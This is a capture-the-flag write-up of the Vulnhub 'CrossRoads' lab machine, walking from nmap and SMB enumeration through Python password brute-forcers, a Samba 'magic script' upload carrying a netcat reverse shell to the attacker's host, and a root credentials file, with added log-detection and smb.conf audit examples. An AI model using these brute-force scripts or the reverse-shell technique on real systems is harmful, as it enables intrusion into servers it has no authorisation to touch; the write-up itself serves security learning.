CrossRoads

tags: Vulnhub Easy Linux
Platform: Vulnhub
Difficulty: Easy
OS: Linux

Enumeration

Nmap

To get started, we run a quick scan for open ports.

# nmap -p- -T4 192.168.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-24 09:45 CET
Nmap scan report for 192.168.1.152
Host is up (0.0027s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 11.95 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 80,139,445 192.168.1.152
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-24 09:46 CET
Nmap scan report for 192.168.1.152
Host is up (0.0011s latency).

PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/crossroads.png
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (93%), Linux 3.2 - 4.9 (93%), Linux 2.6.32 - 3.10 (93%), Linux 3.4 - 3.10 (92%), Synology DiskStation Manager 5.2-5644 (91%), Netgear RAIDiator 4.2.28 (91%), Linux 3.1 (91%), Linux 3.2 (91%), Linux 2.6.32 - 2.6.35 (91%), Linux 2.6.32 - 3.5 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CROSSROADS

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: crossroads
|   NetBIOS computer name: CROSSROADS\x00
|   Domain name: \x00
|   FQDN: crossroads
|_  System time: 2021-03-24T03:46:54-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-03-24T08:46:54
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT     ADDRESS
1   0.30 ms SupTecnico.mshome.net (172.22.192.1)
2   1.40 ms 192.168.1.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds

Gobuster

# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.152/ -x php,txt,html,bak
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.152/
[+] Threads:        10
[+] Wordlist:       directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     bak,php,txt,html
[+] Timeout:        10s
===============================================================
2021/03/24 09:32:27 Starting gobuster
===============================================================
/index.html (Status: 200)
/robots.txt (Status: 200)
/note.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/24 09:39:43 Finished
===============================================================

OK, the web server hosts a file called note.txt; let's take a look at it.

# curl http://192.168.1.152/note.txt
just find three kings of blues
then move to the crossroads
-------------------------------
-abuzerkomurcu

And now, let's enumerate the SMB.

SMB

# enum4linux -a 192.168.1.152
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar 24 18:08:42 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
..........................................................................
..........................................................................
 ============================ 
|    Users on 192.168.1.152    |
 ============================ 
index: 0x1 RID: 0x3e9 acb: 0x00000010 Account: albert   Name:   Desc: 

user:[albert] rid:[0x3e9]
..........................................................................
..........................................................................
[+] Found domain(s):

    [+] CROSSROADS
    [+] Builtin
..........................................................................
..........................................................................
 ====================================================================== 
|    Users on 192.168.1.152 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)
S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert (Local User)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

Among all the information obtained, the important item is a local user called albert. Let's see if we can obtain his password by brute force.

Exploitation

We are going to write a small script to brute-force albert's SMB password.

#!/usr/bin/python3

from smb.SMBConnection import SMBConnection   # pysmb

host = '192.168.1.152'
user = 'albert'

# Read the wordlist line by line rather than loading all of it into memory.
with open('/usr/share/wordlists/rockyou_utf8.txt', 'r', errors='ignore') as passList:
    for passwd in passList:
        passwd = passwd.strip()
        conn = SMBConnection(user, passwd, 'pycon', host, use_ntlm_v2=True, domain='',
                             sign_options=SMBConnection.SIGN_WHEN_SUPPORTED, is_direct_tcp=True)
        # connect() returns True once the session is authenticated, False otherwise
        if conn.connect(host, 445):
            print("[+]  User Credentials Successful: " + user + ":" + passwd)
            conn.close()
            break
        print("[-]  Login Failed for: " + user + ":" + passwd)

And let's run it!

# python3 smbbruter.py
[-]  Login Failed for: albert:123456
[-]  Login Failed for: albert:12345
[-]  Login Failed for: albert:123456789
..........................................................................
..........................................................................
[+]  User Credentials Successful: albert:bradley1
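
From the defender's side, the run above leaves a very recognisable trail: a burst of NT_STATUS_WRONG_PASSWORD events for one account from one host, ending in a NT_STATUS_OK. As an added example (not part of the original writeup), here is a small detector that groups Samba authentication events by source and account and flags a success that follows a run of failures; the log lines are constructed, the field layout is an assumption modelled on the text form of Samba's auth_audit log, and the workstation name PYCON mirrors the 'pycon' client name the script sends.

```python
import re
from collections import defaultdict

# Constructed sample approximating the text form of Samba's auth_audit log
# (`log level = 1 auth_audit:3`); the field layout is assumed, not captured from the box.
SAMPLE_LOG = """\
Auth: [SMB2,(null)] user [WORKGROUP]\\[albert] at [Wed, 24 Mar 2021 09:50:01 CET] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] workstation [PYCON] remote host [ipv4:192.168.1.100:50001]
Auth: [SMB2,(null)] user [WORKGROUP]\\[albert] at [Wed, 24 Mar 2021 09:50:01 CET] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] workstation [PYCON] remote host [ipv4:192.168.1.100:50002]
Auth: [SMB2,(null)] user [WORKGROUP]\\[albert] at [Wed, 24 Mar 2021 09:50:02 CET] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] workstation [DESK-07] remote host [ipv4:192.168.1.50:49200]
Auth: [SMB2,(null)] user [WORKGROUP]\\[albert] at [Wed, 24 Mar 2021 09:50:02 CET] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] workstation [PYCON] remote host [ipv4:192.168.1.100:50003]
Auth: [SMB2,(null)] user [WORKGROUP]\\[albert] at [Wed, 24 Mar 2021 09:50:02 CET] with [NTLMv2] status [NT_STATUS_WRONG_PASSWORD] workstation [PYCON] remote host [ipv4:192.168.1.100:50004]
Auth: [SMB2,(null)] user [WORKGROUP]\\[albert] at [Wed, 24 Mar 2021 09:50:03 CET] with [NTLMv2] status [NT_STATUS_OK] workstation [PYCON] remote host [ipv4:192.168.1.100:50005]
"""

AUTH_RE = re.compile(
    r"Auth: \[[^\]]*\] user \[(?P<dom>[^\]]*)\]\\\[(?P<user>[^\]]*)\] .*?"
    r"status \[(?P<status>NT_STATUS_\w+)\] workstation \[(?P<ws>[^\]]*)\] "
    r"remote host \[ipv4:(?P<ip>[\d.]+):\d+\]"
)


def find_password_guessing(lines, threshold=3):
    """Group auth events by (source IP, account); return those with >= threshold failures.

    Each value records the failure count, the workstation names seen and whether a
    successful logon followed the failures (the trail a successful guess leaves behind).
    """
    stats = defaultdict(lambda: {"failures": 0, "workstations": set(), "success_after_failures": False})
    for line in lines:
        m = AUTH_RE.search(line)
        if not m:
            continue
        s = stats[(m["ip"], m["user"].lower())]
        s["workstations"].add(m["ws"])
        if m["status"] == "NT_STATUS_OK":
            if s["failures"] >= threshold:
                s["success_after_failures"] = True
        else:
            s["failures"] += 1
    return {k: v for k, v in stats.items() if v["failures"] >= threshold}


if __name__ == "__main__":
    for (ip, user), s in find_password_guessing(SAMPLE_LOG.splitlines()).items():
        flag = " then SUCCEEDED" if s["success_after_failures"] else ""
        print(f"{ip} -> {user}: {s['failures']} failed logons from {sorted(s['workstations'])}{flag}")
```

The single mistyped password from DESK-07 stays below the threshold, while the scripted run from 192.168.1.100 is reported together with the logon that finally succeeded.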

Perfect, let's see what shared resources the user has.

# smbclient -L //192.168.1.152 -U albert
Enter WORKGROUP\albert's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    smbshare        Disk      
    IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
    albert          Disk      Home Directories
SMB1 disabled -- no workgroup available

And now, we are going to explore the albert share.

# smbclient //192.168.1.152/albert -U albert
Enter WORKGROUP\albert's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Mar  6 13:45:15 2021
  ..                                  D        0  Tue Mar  2 23:00:47 2021
  smbshare                            D        0  Tue Mar  2 23:16:13 2021
  crossroads.png                      N  1583196  Tue Mar  2 23:34:03 2021
  beroot                              N    16664  Wed Mar  3 00:02:41 2021
  user.txt                            N     1805  Sun Jan  3 18:56:19 2021

        4000320 blocks of size 1024. 3759668 blocks available
smb: \> get user.txt
getting file \user.txt of size 1805 as user.txt (97,9 KiloBytes/sec) (average 97,9 KiloBytes/sec)
smb: \> get beroot
getting file \beroot of size 16664 as beroot (428,2 KiloBytes/sec) (average 322,1 KiloBytes/sec)
smb: \> cd smbshare
smb: \smbshare\> ls
  .                                   D        0  Tue Mar  2 23:16:13 2021
  ..                                  D        0  Sat Mar  6 13:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 23:14:54 2021

        4000320 blocks of size 1024. 3759668 blocks available
smb: \smbshare\> get smb.conf
getting file \smbshare\smb.conf of size 8779 as smb.conf (1428,9 KiloBytes/sec) (average 429,2 KiloBytes/sec) 

Get user flag

# cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
# cat smb.conf
..........................................................................
..........................................................................
path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no

The magic script parameter is set to smbscript.sh. In Samba, magic script names a file which, once a client writes it to the share and closes it, the server executes on behalf of the connected user. So if we create a script with that name and upload it (together with the smb.conf, if need be), it should run and give us a reverse shell. Let's try.
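
As an added example (not from the original writeup), a small audit of an smb.conf for the settings that made this box fall: a writable share with magic script set, writable shares open to guests, and SMB signing not enforced (which the nmap smb2-security-mode output also showed). The sample configuration is constructed from the excerpt above, and the Samba semantics used (writable, writeable and write ok being inverted synonyms of read only, with whichever is set last winning) follow the smb.conf man page.

```python
# Constructed sample smb.conf modelled on the excerpt pulled from the box (not the full file).
SAMPLE_SMB_CONF = """\
[global]
   server signing = auto
[smbshare]
   path = /home/albert/smbshare
   valid users = albert
   writable = yes
   read only = no
   magic script = smbscript.sh
   guest ok = no
[print$]
   read only = yes
"""

TRUE_VALUES = {"yes", "true", "1"}
# smb.conf(5): these are inverted synonyms of 'read only'; whichever is set last wins.
INVERSE_OF_READ_ONLY = {"writable", "writeable", "write ok"}


def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}, folding the writable synonyms into 'read only'."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf[section] = {}
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            key, value = key.strip().lower(), value.strip()
            if key in INVERSE_OF_READ_ONLY:
                key, value = "read only", "no" if value.lower() in TRUE_VALUES else "yes"
            conf[section][key] = value
    return conf


def audit(conf):
    # Returns (severity, section, message) findings for the settings that mattered on this box.
    findings = []
    if conf.get("global", {}).get("server signing", "default").lower() != "mandatory":
        findings.append(("MEDIUM", "global", "server signing is not mandatory"))
    for name, share in conf.items():
        if name == "global":
            continue
        writable = share.get("read only", "yes").lower() not in TRUE_VALUES
        if "magic script" in share:  # an uploaded file of that name runs on close as the connected user
            findings.append(("HIGH" if writable else "LOW", name, "magic script = " + share["magic script"]))
        if writable and share.get("guest ok", "no").lower() in TRUE_VALUES:
            findings.append(("HIGH", name, "writable share permits guest access"))
    return findings
```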

We need to create the smbscript.sh with the reverse shell.

# cat smbscript.sh
nc -e /bin/sh 192.168.1.100 8787

Now upload it to the share, with a netcat listener waiting in another terminal.

smb: \smbshare\> put smbscript.sh

And... got shell!

# nc -lnvp 8787
listening on [any] 8787 ...
connect to [192.168.1.100] from (UNKNOWN) [192.168.1.152] 35112
id
uid=1000(albert) gid=1000(albert) groups=1000(albert)

Post exploitation

Enumeration

albert@crossroads:/home/albert$ wget 192.168.1.100/rockyou_utf8.txt
--2021-03-24 13:36:06--  http://192.168.1.100/rockyou_utf8.txt
Connecting to 192.168.1.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 140056880 (134M) [text/plain]
Saving to: ‘rockyou_utf8.txt’

rockyou_utf8.txt                                           100%[=======================================================================================================================================>] 133.57M   150MB/s    in 0.9s    

2021-03-24 13:36:07 (150 MB/s) - ‘rockyou_utf8.txt’ saved [140056880/140056880]

albert@crossroads:/home/albert$
#!/usr/bin/python3

import subprocess

# Pass each candidate on stdin instead of via `echo "..." | ./beroot`, so that passwords
# containing quotes, $ or backticks are neither mangled nor interpreted by the shell.
with open('rockyou_utf8.txt', 'r', errors='ignore') as passList:
    for passwd in passList:
        passwd = passwd.strip()
        result = subprocess.run(['./beroot'], input=passwd + '\n',
                                capture_output=True, text=True)
        response = result.stdout + result.stderr
        if 'wrong password!!!' not in response:
            print('Password found: {}'.format(passwd))
            print("This is the output: \n{}".format(response))
            break
albert@crossroads:/home/albert$ python3 berootBruter.py
Password found: lemuel

enter password for root
-----------------------

do ls and find root creds

Great! We have the correct password, and the program tells us to run ls to find the credentials. Doing so shows a new file called rootcreds. Let's read it and authenticate as root.

albert@crossroads:/home/albert$ ls
beroot  berootBruter.py  crossroads.png  rockyou_utf8.txt  rootcreds  smbshare  user.txt
albert@crossroads:/home/albert$ cat rootcreds
root
___drifting___
root@crossroads:/home/albert# id
uid=0(root) gid=0(root) groups=0(root)
root@crossroads:/home/albert# cd /root
root@crossroads:~# ls
beroot.sh  creds  passwd  root.txt
root@crossroads:~# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

root@crossroads:~#

It is entertaining, but it is too CTF-style for my liking. Anyway, nice box!